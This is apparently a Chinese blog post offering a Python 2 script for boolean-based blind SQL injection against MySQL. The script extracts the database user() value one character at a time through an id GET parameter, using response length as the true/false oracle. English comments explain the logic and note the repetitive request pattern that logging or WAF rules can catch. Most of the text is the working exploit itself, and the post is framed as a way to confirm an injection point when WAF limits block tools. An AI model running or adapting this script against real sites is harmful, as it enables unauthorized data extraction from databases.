Mysql布尔盲注脚本

当某个盲注点不能使用工具（一般是因为有 WAF 限制）的时候，可以使用这个脚本来证明漏洞的存在。

#! usr/bin/env python
# -*- coding: utf-8 -*-

import httplib
import time
import string
import sys
import random
import urllib

# Boolean-based blind extraction of the MySQL user() value, one character at a
# time, through a GET parameter on the host hard-coded below. Each request
# embeds a single candidate character in the injected condition; the length of
# the response body is used as the true/false oracle. Python 2 code (print
# statements, httplib).
#
# Defender's view: the traffic is one request per (position, candidate) pair,
# i.e. up to 20 * len(payloads) = 780 GETs to the same path, each carrying
# "ascii(mid(lower(user()),<i>,1))=<n>" in the id parameter -- a repetitive
# pattern that request logging and a WAF rule can match directly.
headers = {'User-Agent': 'Mozilla/5.0 Chrome/28.0.1500.63',}
# Candidate alphabet: lowercase letters, digits, '@', '_' and '.'. A character
# of user() outside this set is never matched; that position is skipped because
# the inner loop finishes without appending anything.
payloads = list('abcdefghijklmnopqrstuvwxyz0123456789@_.')
print 'start to retrive MySQL user:'
user = ''
# Positions 1..20 of user(); MySQL mid() is 1-based. There is no stop condition
# for a shorter value, so every position is probed regardless.
for i in range(1,21):
    for payload in payloads:
        # A fresh connection per candidate; the timeout is 4 seconds.
        conn = httplib.HTTPConnection('www.example.com', timeout=4)  # connect, host
        # The injected condition; ord(payload) is the ASCII code of the candidate.
        s = "ascii(mid(lower(user()),%s,1))=%s" % (i, ord(payload))  # payload
        # The condition is placed in the URL as-is; urllib is imported at the top
        # of the file but never used here.
        conn.request(method='GET',url="/php/1.php?id=1 and %s" % s,headers = headers)  # url
        html_header= conn.getresponse().read()
        length=len(html_header)
        # Oracle: a body longer than 10000 bytes is treated as "condition true".
        # The threshold is a fixed constant for the target page, not derived
        # from a baseline request.
        if length>10000:
            user+=payload
            sys.stdout.write('\r[In progress] %s' % user)
            sys.stdout.flush()
            # break leaves the loop before conn.close() below, so the connection
            # of a matched candidate is never closed explicitly.
            break
        else:
            print '.',
        conn.close()

print '\n[Done]MySQL user is', user